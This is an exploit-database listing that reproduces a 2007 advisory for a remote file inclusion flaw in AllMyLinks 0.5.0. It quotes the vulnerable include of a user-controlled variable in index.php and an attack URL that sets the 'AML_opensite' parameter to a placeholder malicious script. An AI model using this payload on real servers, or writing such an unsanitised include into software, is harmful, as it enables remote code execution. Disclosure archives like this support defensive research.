header-logo
Suggest Exploit
vendor:
AllMyLinks
by:
GolD_M
7.5
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: AllMyLinks
Affected Version From: AllMyLinks 0.5.0
Affected Version To: AllMyLinks 0.5.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

AllMyLinks 0.5.0 Remote Code Execution

This exploit allows remote attackers to execute arbitrary code on the target system by exploiting a vulnerability in the AllMyLinks 0.5.0 application. By sending a specially crafted request to the 'index.php' page with the 'AML_opensite' parameter set to a malicious script, an attacker can execute arbitrary code on the target system. This vulnerability was published on 2007-01-07 on milw0rm.com.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to upgrade to a newer version of the software if available, or to implement strong input validation and sanitization to prevent remote code execution attacks.
Source

Exploit-DB raw data:

/###################################################################\
#                          AllMyLinks 0.5.0                         #
#    =========================================================      #
#    Published :  2007-01-07                                        #
#    Remote: Yes                                                    #
#    Site: http://download.php-resource.net/AllMyLinks/AllMyLinks0.5.0.zip
#####################################################################
#    Author: GolD_M                                                 #
#    Contact: HackEr_@W.CN                                          #
#    =====================================================          #
#    ThanX = All My Friends & ABDULLAH00 & MilW0rm.Com              #
#    SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                #
\###################################################################/
In :
/index.php
Line:
/77
Vulnerable Code:
/include("$AML_opensite");
3xpl!T
/index.php?AML_opensite=[Ev!L_Scr!pT]
/#######################################\
#         Tryag.Com & Dwrat.Com         #
\#######################################/

# milw0rm.com [2007-01-07]

Navigation

Suggest Exploit

Services By CQR